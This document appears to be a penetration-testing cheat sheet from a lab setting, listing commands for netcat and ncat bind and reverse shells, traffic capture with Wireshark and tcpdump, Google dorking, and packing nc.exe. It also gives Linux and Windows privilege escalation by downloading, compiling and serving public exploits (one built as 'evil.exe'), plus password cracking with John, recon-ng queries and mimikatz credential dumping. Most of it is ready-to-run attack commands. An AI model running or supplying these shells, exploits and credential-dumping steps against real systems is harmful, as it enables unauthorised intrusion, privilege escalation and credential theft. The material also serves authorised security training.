# Netcat

Linux             192.168.2.10
Windows           192.168.2.12

# Chat
Windows           nc -nlvp 4444
Linux             nc -nv 192.168.2.12 4444

# Bind shell
Windows           nc -nlvp 4444 -e cmd.exe
Linux             nc -nv 192.168.2.12 4444

# Reverse shell
Windows           nc -nlvp 4444
Linux             nc -nv 192.168.2.12 4444 -e /bin/bash
------------------------------------------------------------------------------------------------------

# Ncat is part of the nmap package.

Files needed for Windows 7: ncat.exe, libeay32.dll, ssleay32.dll

# Bind shell
Windows           ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl
Linux             ncat -nv 192.168.2.12 4444 --ssl
------------------------------------------------------------------------------------------------------

# Wireshark

Capture > Interfaces > choose your interface.
To filter out unwanted traffic choose Options.
Create a capture filter to only listen for traffic on the Windows box on TCP port 4444.
     host 192.168.2.12 and tcp port 4444
     Start

Now generate some traffic with netcat.

Go to Wireshark and hit Stop.
Right click on any packet > Follow TCP Stream. You should be able to see clear text.
------------------------------------------------------------------------------------------------------

# tcpdump

tcpdump -r <capture.pcap>                              # Read the file
tcpdump -n src host 192.168.2.10 -r <capture.pcap>     # Specify a source
tcpdump -n dst host 192.168.2.12 -r <capture.pcap>     # Specify a destination
tcpdump -n port 443 -r <capture.pcap>                  # Specify a port
tcpdump -nX -r <capture.pcap>                          # Read the file and dump in hex format
------------------------------------------------------------------------------------------------------

# Google Hacking

site:target.com                                 # Approximate web presence of an organization
site:target.com -site:www.target.com            # Subdomains that may exist
filetype
inurl
intitle
------------------------------------------------------------------------------------------------------

# debug.exe

cp /usr/share/windows-binaries/nc.exe /root/
cp /usr/share/windows-binaries/exe2bat.exe /root/
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
------------------------------------------------------------------------------------------------------

# Local Privilege Escalation - Linux

ssh user@<target IP>
id                                              # Show user/group permissions
cat /etc/shadow                                 # Access denied
/etc/issue                                      # OS info
uname -a                                        # Kernel info

wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o exploit exploit.c                        # Compile exploit
./exploit                                       # Run exploit
id                                              # Show user/group permissions
cat /etc/shadow

Option 2 - using Kali
searchsploit linux local root
Mempodipper - Linux Local Root => 2.6.39 (32-bit & 64-bit)                /linux/local/18411.c
cp /usr/share/exploitdb/platforms/linux/local/18411.c /tmp/
cd /tmp/
gcc -o exploit 18411.c                          # Compile exploit
Transfer exploit to victim.
------------------------------------------------------------------------------------------------------

# Local Privilege Escaltion - Windows XP, 2003

searchsploit ms11-080
cp /usr/share/exploitdb/platforms/windows/local/18176.py /tmp/
cd /usr/share/pyinstaller/ 
pyinstaller -F -n evil.exe /tmp/18176.py
cp evil.exe/dist/evil.exe /tmp/

service apache2 start                           # Start apache.
netstat -antp | grep apache                     # Verify the service is running.
cp /tmp/evil.exe /var/www/                      # Copy the exploit to the web root.
------------------------------------------------------------------------------------------------------

# Password Cracking

john hashes -w=/usr/share/wordlists/rockyou.txt --format=nt
------------------------------------------------------------------------------------------------------

# recon-ng

recon-ng -w <workspace> -r <resource file>

Show various framework items
Usage: show [banner|companies|contacts|creds|dashboard|domains|hosts|keys|leaks|locations|modules|netblocks|options|ports|pushpins|schema|vulnerabilities|workspaces]

workspaces <add|delete|select> <name>
Example: workspaces add target.com
Example: workspaces select target.com

Adds items to the database
Usage: add [companies|contacts|creds|domains|hosts|leaks|locations|netblocks|ports|pushpins|vulnerabilities]
Example: add domains
domain (TEXT): target.com

spool start <file>
show modules

query SELECT <field, field2|*> FROM <hosts|contacts|creds> WHERE <field>='value' ORDER BY <field>
query SELECT * FROM hosts ORDER BY host
query SELECT host, ip_address FROM hosts ORDER BY host
query SELECT email FROM contacts ORDER BY email
query SELECT * FROM contacts ORDER BY fname
query SELECT fname, lname FROM contacts ORDER BY fname
query SELECT lname, fname FROM contacts ORDER BY lname
query DELETE FROM hosts WHERE ip_address='192.168.2.12'
------------------------------------------------------------------------------------------------------

# mimikatz

mimikatz
priviledge::debug
sekurlsa::logonpasswords
